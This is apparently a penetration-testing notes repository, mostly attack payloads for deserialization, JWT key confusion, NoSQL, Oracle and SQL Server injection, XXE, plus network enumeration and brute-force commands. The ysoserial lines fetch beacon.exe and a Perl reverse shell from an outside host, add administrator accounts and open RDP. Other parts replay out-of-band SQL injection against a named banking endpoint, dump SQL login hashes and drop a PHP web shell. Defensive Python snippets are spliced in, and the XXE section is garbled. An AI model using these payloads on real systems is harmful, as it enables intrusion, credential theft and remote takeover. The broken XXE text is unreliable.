```
├── Insecure deserialization.md
├── JSON Web Token Attack.md
├── NoSQL Injection.md
├── OS_Command.md
├── Oracle SQL Injection Syntax.md
├── Penetration Testing.md
├── SQL Server Union-Based SQL Injection.md
├── Speical Grepping.md
└── XXE.md
```

---

**Insecure deserialization.md**

# Insecure deserialization Vulnerability

An insecure deserialization vulnerability can occur when a serialized object is allowed to be altered before it is deserialized. Consequently, deserialization vulnerabilities can allow an attacker to perform remote code execution without authentication in the context of the application server and to gain access to unauthorized data. In web applications, serialized objects are generally sent across in base64 format. Technically, serialization is the process of converting an object and its class into a binary form so that it can be saved to disk; deserialization, on the other hand, is the reverse process of converting that binary form back into the original object at the code stage.
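Since serialized objects reach the server base64-encoded, a defender can recognise them in request logs by decoding each parameter and checking its leading bytes. The following Python is an added example, not code from these notes: the request body it scans is constructed for the example, while the format headers it matches (Java 0xACED0005, the .NET BinaryFormatter header, the 0xFF01 LosFormatter header behind __VIEWSTATE, and PHP serialize() output) are the real ones.

```python
"""Spot base64-encoded serialized objects in form parameters.

Added example, not from the original notes. Each value is decoded and
its leading bytes are compared against well-known serialization headers.
"""
import base64
import binascii
import re
from typing import Dict, Optional
from urllib.parse import parse_qsl, quote

# (header bytes, label). The 0xFF01 LosFormatter header is only two bytes,
# so treat a hit on it as a hint to also look at the parameter name.
MAGIC = [
    (b"\xac\xed\x00\x05", "java-serialized"),                          # base64 rO0AB...
    (b"\x00\x01\x00\x00\x00\xff\xff\xff\xff", "dotnet-binaryformatter"),  # base64 AAEAAAD/////
    (b"\xff\x01", "dotnet-losformatter/viewstate"),                    # base64 /wE...
]
PHP_SERIALIZED = re.compile(rb'^(O:\d+:"|a:\d+:\{)')


def b64_decode_loose(value: str) -> Optional[bytes]:
    """Decode standard or URL-safe base64, tolerating stripped padding."""
    s = value.strip().replace("-", "+").replace("_", "/")
    s += "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify(raw: bytes) -> Optional[str]:
    """Name the serialization format the bytes start with, or None."""
    for magic, label in MAGIC:
        if raw.startswith(magic):
            return label
    if PHP_SERIALIZED.match(raw):
        return "php-serialized"
    return None


def scan_form_body(body: str) -> Dict[str, str]:
    """Return {parameter: format} for every value that decodes to a serialized object."""
    hits: Dict[str, str] = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        raw = b64_decode_loose(value)
        if raw is None:
            continue
        label = classify(raw)
        if label:
            hits[name] = label
    return hits


# Constructed request body (not captured traffic): two parameters carry
# serialized-object headers followed by filler bytes, two are harmless.
SAMPLE_BODY = "&".join([
    "user=alice",
    "obj=" + quote(base64.b64encode(b"\xac\xed\x00\x05sr\x00").decode()),
    "__VIEWSTATE=" + quote(base64.b64encode(b"\xff\x01\x0f\x0f").decode()),
    "note=" + quote(base64.b64encode(b"hello world").decode()),
])

if __name__ == "__main__":
    for param, fmt in scan_form_body(SAMPLE_BODY).items():
        print(f"{param}: {fmt}")
```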
# SOAP NET Deserialization
```
ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -c "cmd /c ipconfig" -o raw
ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -c "cmd /c hostname" -o raw
ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -c "cmd /c certutil.exe -urlcache -split -f http://192.168.100.199\beacon.exe C:\\Users\\Public\\beacon.txe" -o raw
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f"

ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c netsh advfirewall firewall set rule group="remote desktop" new enable=Yes"
```
# Java Deserialization

In a Java-based application, a deserialization vulnerability may occur when any serialized stream is converted back into an object without first being validated. Because this stems from a combination of two rudimentary implementation flaws, deserialization vulnerabilities are considered difficult for developers to secure in the application.
```
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "wget sdfsfdoztjxibkocen698fskck0ehs8yymn.burpcollaborator.net"
java -jar ysoserial-0.0.5-all.jar CommonsCollections1 'wget http://192.168.100.199:1010/reverse-shell.pl -O /tmp/shell.pl' > perl-reverse-shell.pl.bin
java -jar ysoserial-0.0.5-all.jar CommonsCollections1 'cat /etc/passwd' > passwd.bin
```
# ViewState Deserialization

View state is the technique an ASP.NET Web page uses by default to persist changes to the state of a Web Form across postbacks. Technically, ViewState stores user data on the page at the time of a postback; however, ViewState does not hold the controls themselves, it holds the values of the controls. When the page is accessed, the current state of the page and the values that need to be retained during postback are serialized into base64-encoded strings and output in the ViewState hidden field or fields.

**It might be possible to execute arbitrary OS commands in the context of the application server if MAC validation is not enforced on the ViewState parameter.**

This format appears to be standard across ViewState implementations in ASP.NET applications.

* Base64 **(defined by the EnableViewStateMac and ViewStateEncryptionMode attributes set to false)**
* Base64 + MAC (Message Authentication Code) enabled **(defined by the EnableViewStateMac attribute set to true)**
* Base64 + Encrypted **(defined by the ViewStateEncryptionMode attribute set to true)**
```
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c certutil.exe -urlcache -split -f http://192.168.100.199\beacon.exe C:\\Users\\Public\\beacon.exe"
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f"

ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c netsh advfirewall firewall set rule group="remote desktop" new enable=Yes"
```
# Json Deserialization
```
ysoserial.exe -g WindowsIdentity -f Json.Net -c "ping 192.168.100.100" -o base64
ysoserial.exe -g WindowsIdentity -f Json.Net -c "cmd /c net user MeMe 123456!@ /add " -o base64
ysoserial.exe -g WindowsIdentity -f Json.Net -c "net localgroup administrators MeMe /add" -o base64
ysoserial.exe -g WindowsIdentity -f Json.Net -c "cmd /c netsh advfirewall firewall set rule group="remote desktop" new enable=Yes" -o base64
ysoserial.exe -g WindowsIdentity -f Json.Net -c "cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f" -o base64
```

* Credit@https://book.hacktricks.xyz/pentesting-web/deserialization
* Credit@https://speakerdeck.com/pwntester/attacking-net-serialization?slide=5
* Credit@https://0xdf.gitlab.io/2020/02/15/htb-json.html
* Credit@https://notsosecure.com/remote-code-execution-via-php-unserialize/?utm_campaign=calap.co&utm_medium=referral&utm_source=calap.co
* Credit@https://0xrick.github.io/hack-the-box/arkham/

---

**JSON Web Token Attack.md**

### JSON Web Authentication

JSON Web Tokens are used by most modern web applications to exchange claims between two endpoints, protecting the integrity of the underlying message with a Message Authentication Code (MAC).

* The header contains metadata: it defines the type of token and the algorithm used to sign the payload.
* The payload contains the claims for routes and services as key-value pairs.
* The signature is calculated over the base64url-encoded values of the header and payload using a secret key.

### HMAC Secret Key Brute-forcing

The HS256 algorithm uses a secret key to sign and verify each message. The RS256 algorithm uses a private key to sign messages and a public key to verify them, so the public key is what the verifier uses for authentication.
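To show the defender's side of the HS256/RS256 distinction above (and of the public-key-as-HMAC-secret trick the next section walks through), here is an added Python example that is not from the original notes: a verifier that pins the algorithm to HS256 and compares signatures in constant time, so a token whose header asks to be checked any other way is rejected regardless of its signature. The secret and claims are constructed for the example.

```python
"""Verify an HS256 JWT with the algorithm pinned and a constant-time
signature check. Added example, not from the original notes; the secret
and claims used below are constructed.
"""
import base64
import binascii
import hashlib
import hmac
import json
from typing import Any, Dict, Optional

SECRET = b"constructed-example-secret"  # stand-in for the server's HS256 key


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: Dict[str, Any], secret: bytes) -> str:
    """Issue header.payload.signature with HMAC-SHA256 over the first two parts."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes) -> Optional[Dict[str, Any]]:
    """Return the claims if the token verifies under HS256 with `secret`, else None.

    The algorithm is pinned on the server side: a header naming "RS256",
    "none" or anything else is refused before any key is touched, which is
    what closes the RS256-to-HS256 key-confusion trick.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        provided = b64url_decode(sig_b64)
    except (ValueError, binascii.Error):
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    # compare_digest avoids leaking how many leading bytes matched
    if not hmac.compare_digest(expected, provided):
        return None
    try:
        claims = json.loads(b64url_decode(payload_b64))
    except (ValueError, binascii.Error):
        return None
    return claims if isinstance(claims, dict) else None


if __name__ == "__main__":
    token = sign_hs256({"sub": "alice", "role": "user"}, SECRET)
    print(token)
    print(verify_hs256(token, SECRET))
```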
```
python3 jwtcat.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4 -w /usr/share/wordlists/rockyou.txt

python3 jwtcat.py -t -w /usr/share/wordlists/rockyou.txt

python3 jwtcat.py -w /usr/share/wordlists/rockyou.txt
```

### JSON Public Keys
The HS256 algorithm uses a secret key to sign and verify each message. The RS256 algorithm uses a private key to sign messages and a public key to verify them.
**To obtain the public key using the openssl client**
```
TARGET_HOST=""
TARGET_PORT="443"
openssl s_client -showcerts -connect $TARGET_HOST:$TARGET_PORT </dev/null | openssl x509 -outform PEM > $TARGET_HOST.pem
openssl x509 -in $TARGET_HOST.pem -pubkey -noout > key.pem
cat key.pem | xxd -p | tr -d '\n' # turn the PEM into ASCII hex format
```
To compute the HMAC signature being used by the targeted application:
```
echo -n "" | openssl dgst -sha256 -mac HMAC -macopt hexkey:<HEX_OF_PUBLIC_KEY>
```
**Upon obtaining the HMAC signature, the final step is to convert it to JWT format**
```
python3 -c "import base64, binascii; print(base64.urlsafe_b64encode(binascii.a2b_hex('')).decode().rstrip('='))"
```

* Credit@https://book.hacktricks.xyz/pentesting-web/hacking-jwt-json-web-tokens
* Credit@https://pentesterlab.com/exercises/jwt_iii/course
* Credit@https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6

---

**NoSQL Injection.md**

# NoSQL Injection methodology

# NoSQL Operators

```
$ne — not equal
$gt — greater than
$regex — regular expression
$where — clause that lets you specify a script to filter results
```

# NoSQL Union Query Injection

Let's try to provoke an error by submitting a string followed by a single quote (') character; we will come across the following:
```
https://demo-campass.obih.sg/name=TestUser1'
https://demo-campass.obih.sg/name=TestUser3
https://demo-campass.obih.sg/name=Testuser3', 'address': 'WestJurong
https://demo-campass.obih.sg/name=TestUser3',name:{$ne:'A'},address:'WestJurong
```

# Blind NoSQL Injection
Suppose that the database returned no results in the browser regardless of whether we submitted an existing Star Wars character or not. In that case we are talking about a "blind" injection:
```
https://demo-campass.obih.sg/?name=A',$where: 'function(){sleep(20000);}'}
https://demo-campass.obih.sg/?name=A,$where: 'function(){sleep(20000);}'}
```

---

**OS_Command.md**

#### OS Command

```
create table MeMe(stuff text);
insert into MeMe values('');
select * from MeMe into dumpfile 'var\\www\\html1\\cmd.php';
```

---

**Oracle SQL Injection Syntax.md**

### Real world example of Oracle SQL Injection

# Basic Oracle Blind SQL Injection Payloads
```
1' and if(1=1, sleep(20), true)#
1' or if(1=1, sleep(20), true)#
1' and if(1=1, sleep(20), false)#
1' or if(1=1, sleep(20), true)#
1' and if(1=1, sleep(20), true) -- -
1' or if(1=1, sleep(20), true) -- -
1' and if(1=1, sleep(20), false) -- -
1' or if(1=1, sleep(20), true) -- -
```
# Real world example of Oracle SQL Injection
This application security assessment was conducted by me 3 years ago. I released my notes on Oracle-based SQL injection due
to references for Oracle-based SQL injection having been scarce while I was conducting Oracle-based SQL injection.
```
POST /B001/process.jsp HTTP/1.1
Host: 122.248.119.25
User-Agent: Mozilla/5.0 (utl_inaddr.get_host_address((select user from dual))--+) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://122.248.119.25/B001/banking?fldsegment=EN1
```

```
POST /B001/process.jsp HTTP/1.1
Host: 122.248.119.25
User-Agent: Mozilla/5.0 (utl_inaddr.get_host_address((select banner from v$version where rownum=1))--) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://122.248.119.25/B001/banking?fldsegment=EN1
```

```
POST /B001/process.jsp HTTP/1.1
Host: 122.248.119.25
User-Agent: Mozilla/5.0 (utl_inaddr.get_host_address((select username FROM user_role_privs WHERE granted_role='DBA';))--) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://122.248.119.25/B001/banking?fldsegment=EN1
```

```
POST /B001/process.jsp HTTP/1.1
Host: 122.248.119.25
User-Agent: Mozilla/5.0 (utl_inaddr.get_host_address((select owner, table_name FROM all_tables;))--) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://122.248.119.25/B001/banking?fldsegment=EN1
```

```
https://10.10.10.13:7001/product.jsp?=info ||UTL_INADDR.GET_HOST_NAME( (SELECT user FROM DUAL) )--
https://10.10.10.13:7001/product.jsp?=info ||UTL_INADDR.GET_HOST_NAME( (SELECT global_name FROM global_name;) )--
https://10.10.10.13:7001/product.jsp?=info ||UTL_INADDR.GET_HOST_NAME( (SELECT * FROM session_privs;(Retrieves Current Privs)) )--
```

---

**Penetration Testing.md**

### useful curl

```
curl -s -I http://example.org | grep '^HTTP'
curl -s -I https://example.org | grep '^HTTP'
curl -s -I https://example.org | grep '^Strict'
curl --sslv3 https://example.org
curl --tlsv1.0 -I https://example.org
curl --tlsv1.1 -I https://example.org
curl --tlsv1.2 -s -I https://example.org | grep 'HTTP'
curl -s -I https://example.org | grep '^X-Frame-Options'
curl -s -I https://example_2.org | grep '^X-Frame-Options'
curl -s -I https://example.org | grep '^X-Content'
curl -s -I example.com/url_that_sets_cookie | grep '^Set-Cookie'
nmap -p 443,80 --script http-security-headers
curl -I -L --url
curl -L http://www.google.com (follow HTTP Location headers with the -L option)
curl -I
curl -x http://10.10.10.10:8080 -L http://sample.com (local proxy)
curl -v https://google.com (testing a connection to a remote site)
curl -I -H 'Accept-Encoding: gzip,deflate' http://example.com/index.php (checking headers)
curl -v -X OPTIONS http://192.168.56.103 (check OPTIONS)
curl -X PUT -d ' ~/labnet-ip-list.txt
nmap -p80 --script dns-brute strategicsec.com
nmap --script http-robtex-reverse-ip secore.info
nmap -Pn -p80 --script=http-headers strategicsec.com
nmap -sS -sU -PN -p 1-65535 192.168.0.164 (TCP SYN and UDP)
nmap --script http-methods
nmap -p 80 --script dns-brute.nse
nmap --script http-enum
nmap -Pn -p80 --script=http-headers x.x.x.x
```

### Oracle Attack Methodology

```
oscanner -s 192.168.1.200 -P 1521
nmap --script=oracle-tns-version
nmap -p 1521 -A TARGET
nmap --script=oracle-brute
auxiliary/scanner/oracle/tnslsnr_version (Oracle version)
auxiliary/scanner/oracle/tnspoison_checker
auxiliary/scanner/oracle/sid_enum
auxiliary/admin/oracle/sid_brute
auxiliary/scanner/http/oracle_ilom_login
```

### SMB service Exploit

```
auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/smb_enumusers
exploit/windows/smb/psexec
```
### null sessions
```
nmap --script smb-enum-users.nse -p 445
rpcclient -U "" [target IP address]
querydominfo
enumdomusers
queryuser [username] # queryuser msfadmin
enum4linux 192.168.200.129
smbclient //192.168.0.14/tmp
```
### SNMP Service Exploit

```
auxiliary/scanner/snmp/snmp_login
auxiliary/scanner/snmp/snmp_enumusers
auxiliary/scanner/snmp/snmp_enumshares
auxiliary/scanner/snmp/snmp_enum

hydra -P pass.txt snmp
nmap -sU -v --script snmp-brute --script-args passdb=passwords.lst
nmap -sU -v --script snmp-brute --script-args userdb=usernames.lst,passdb=passwords.lst
```

### MSSQL

```
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
auxiliary/admin/mssql/mssql_enum
auxiliary/scanner/oracle/tnspoison_checker
auxiliary/scanner/mssql/mssql_ping
exploit/windows/mssql/mssql_payload
```

### VPN Assessment
```
IPsec Enumeration
ike-scan --showbackoff 10.0.0.3 10.0.0.6

ike-scan -M 172.16.21.200
```

### Enumeration & Attacking Network Services

```
SNMP Enumeration
snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1
snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d* * -f
snmpenum -t 192.168.1.X

nmblookup -A 1.1.1.1
smbclient //MOUNT/share -I target -N
rpcclient -U "" 1.1.1.1
enum4linux target
nbtscan 192.168.1.0/24
enum4linux -a target-ip
Fingerprint SMB version (smbclient -L //192.168.1.100)
```

### Useful Metasploit Scan
```
scanner/ftp/ftp_version
scanner/ssh/ssh_version
scanner/mssql/mssql_ping
scanner/smb/smb_version
auxiliary/scanner/misc/oki_scanner
auxiliary/scanner/snmp/aix_version
auxiliary/scanner/snmp/cisco_config_tftp
auxiliary/scanner/snmp/cisco_upload_file
auxiliary/scanner/snmp/snmp_enum
auxiliary/scanner/snmp/snmp_enumshares
auxiliary/scanner/snmp/snmp_enumusers
auxiliary/scanner/snmp/snmp_login
auxiliary/scanner/snmp/snmp_set
auxiliary/gather/enum_dns
auxiliary/scanner/http/http_version
auxiliary/scanner/http/tomcat_enum
auxiliary/scanner/ssh/ssh_users
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/http/joomla_plugins
auxiliary/scanner/http/wordpress_scanner
auxiliary/scanner/http/joomla_version
```

### DNS Recon and MX Record

```
nslookup -query=mx redhat.com
nslookup -type=ns redhat.com
nslookup -type=soa redhat.com
nslookup -type=any google.com
Using a specific DNS server
nslookup redhat.com ns1.redhat.com
nslookup -port 56 redhat.com
nslookup -debug redhat.com
whois domain-name-here.com
Perform DNS IP lookup (dig a domain-name-here.com @nameserver)
Perform MX record lookup (dig mx domain-name-here.com @nameserver)
Perform zone transfer with dig (dig axfr domain-name-here.com @nameserver)
dig 1.1.1.1 -t any
dig 1.1.1.1 -t mx
dig 1.1.1.1 -t axfr
dig -x 1.1.1.1

dnsrecon -d 1.1.1.1
dnsenum nintendo.com
host -t ns megacorpone.com
host -t mx megacorpone.com
host idontexist.megacorpone.com
```

### DNS Zone Transfers
```
nslookup -> set type=any -> ls -d blah.com
dig axfr blah.com @ns1.blah.com
host -l megacorpone.com ns1.megacorpone.com
host -l megacorpone.com ns2.megacorpone.com
dnsrecon -d megacorpone.com -t axfr
```

### Wfuzz Web application fuzzer

```
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.1.202/FUZZ
wfuzz -c -z file,/usr/share/wfuzz/wordlist/vulns/sql_inj.txt --hc 404 http://192.168.1.202/FUZZ
wfuzz.py -c -v -w wordlist/general/common.txt --hc 404 https://portswigger.net/FUZZ
wfuzz -c -v -z file,wordlist/Injections/SQL.txt --hc 404 http://www.example.com/index.php?id=FUZZ
wfuzz -c -v --sc 200 -z file,pass.txt -d "username=admin&password=FUZZ" http://example.com/login.php
```
### Brute Force Network Service

```
hydra -t 5 -V -f -l root -P common.txt ftp://192.168.67.132
hydra -t 1 -V -f -l administrator -P common.txt rdp://192.168.67.132
hydra -t 5 -V -f -l root -P common.txt localhost ssh
hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql

hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V

hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V

hydra -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V
```
### ALL windows password Cracking

```
Make sure the SYSTEM and SAM hive files are copied to your Desktop (or somewhere else)

Step 1 - bkhive system /root/Desktop/sample.txt
Step 2 - samdump2 SAM /root/Desktop/sample.txt > /root/hash.txt

Step 3 - Crack the password hashes using John the Ripper
john --format=nt2 hash.txt
Step 4 - View the hash file to see the cracked passwords
```

### Passive Operating System Fingerprinting

```
p0f -i eth0 -p
p0f -i eth1 -o output.txt
ping x.x.x.x
```

### VOIP Assessment

```
auxiliary/scanner/sip/options
auxiliary/scanner/sip/vsipinvate
smap 192.168.1.104 (scanning a single host)
smap 192.168.1.130/24 (scanning a range of IPs)
smap -O 192.168.1.104 (smap fingerprinting of the server/client type and version)
sip-scan -i eth0 192.168.1.1-254 (scanning a subnet)
svmap.py 192.168.1.1-254 (scanning an IP range)
svmap.py 192.168.1.1-254 --fp (fingerprint scanning)
### http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP
```

### OS Fingerprint and Source Port Filtering Bypass
```
OS fingerprint

#xprobe2 -v 192.168.0.174

Specific source ports to bypass filtering
hping2 -c 3 -s 53 -p 139 -S 192.168.0.1
```

### SMTP User enumeration

```
smtp-user-enum -M VRFY -U users.txt -t 10.0.0.1
smtp-user-enum -M VRFY -u root -t 10.0.0.1
smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt
smtp-user-enum -M EXPN -D example.com -U users.txt -t 10.0.0.1
```

---

**SQL Server Union-Based SQL Injection.md**

### SQL Server Union-Based SQL Injection
```
https://192.168.100.1/profile.aspx?id=2 order by 100--
https://192.168.100.1/profile.aspx?id=2 order by 50--
https://192.168.100.1/profile.aspx?id=2 order by 25--
https://192.168.100.1/profile.aspx?id=2 order by 10--
https://192.168.100.1/profile.aspx?id=2 order by 5--
https://192.168.100.1/profile.aspx?id=2 order by 6--
https://192.168.100.1/profile.aspx?id=2 order by 7--
https://192.168.100.1/profile.aspx?id=2 order by 8--
https://192.168.100.1/profile.aspx?id=2 order by 9--
https://192.168.100.1/profile.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--

https://192.168.100.1/profile.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
https://192.168.100.1/profile.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
https://192.168.100.1/profile.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
https://192.168.100.1/profile.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
```

---

**Speical Grepping.md**

```
cat list.txt
https://github.com/NyaMeeEain
```
```
for i in $(cat list.txt); do data=$(curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" -L -I -s -k "$i") ; echo "URL: $i" >> output.txt ; echo "$data" >> output.txt ; done
cat output.txt | grep -o '' | sed -e 's/
```

---

**XXE.md**

```
]>
&NyaMeeEain;mypass

]>
&NyaMeeEain;mypass
```

# blind XXE

* cat /var/www/dtd.xml
* nc -nlvp 775
```
">

">
```
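As an added example tied to the NoSQL Injection section above (not code from these notes): a Python input layer that accepts only scalar values for a MongoDB equality filter, so the `name[$ne]=A` and top-level `$where` shapes used in those payloads never reach the driver. The allowed field list and the bracket-notation parser are assumptions standing in for a real framework's body parser.

```python
"""Keep MongoDB query operators out of user-controlled filter values.

Added example, not from the original notes. A request that reaches the
driver as {"name": {"$ne": "A"}} or {"$where": "..."} is a query, not a
value; this layer accepts only plain scalars for a fixed set of fields.
"""
from typing import Any, Dict, Mapping, Set
from urllib.parse import parse_qsl


class UnsafeQueryValue(ValueError):
    """Raised when user input would change the shape of the query."""


def clean_value(field: str, value: Any) -> Any:
    """Allow str/int/float/bool; dicts and lists are how operators arrive."""
    if isinstance(value, (str, int, float, bool)):
        return value
    raise UnsafeQueryValue(f"{field}: {type(value).__name__} is not a plain value")


def build_filter(user_input: Mapping[str, Any], allowed_fields: Set[str]) -> Dict[str, Any]:
    """Build an equality-only filter; unknown or $-prefixed keys are refused."""
    filt: Dict[str, Any] = {}
    for field, value in user_input.items():
        if field.startswith("$") or field not in allowed_fields:
            raise UnsafeQueryValue(f"unexpected field {field!r}")
        filt[field] = clean_value(field, value)
    return filt


def is_safe_filter(user_input: Mapping[str, Any], allowed_fields: Set[str]) -> bool:
    try:
        build_filter(user_input, allowed_fields)
        return True
    except UnsafeQueryValue:
        return False


def parse_bracket_query(qs: str) -> Dict[str, Any]:
    """Imitate a qs-style body parser that turns name[$ne]=A into {"name": {"$ne": "A"}}.

    Assumption: this mimics the framework's parser so the example runs
    offline; it is not a real library.
    """
    out: Dict[str, Any] = {}
    for key, value in parse_qsl(qs, keep_blank_values=True):
        if "[" in key and key.endswith("]"):
            base, sub = key[:-1].split("[", 1)
            nested = out.setdefault(base, {})
            if isinstance(nested, dict):
                nested[sub] = value
        else:
            out[key] = value
    return out


if __name__ == "__main__":
    # Constructed inputs mirroring the payload shapes in the notes above.
    allowed = {"name", "address"}
    for raw in ("name=TestUser3&address=WestJurong", "name[$ne]=A",
                "name=A&$where=function(){sleep(20000);}"):
        verdict = "ok" if is_safe_filter(parse_bracket_query(raw), allowed) else "rejected"
        print(f"{raw} -> {verdict}")
```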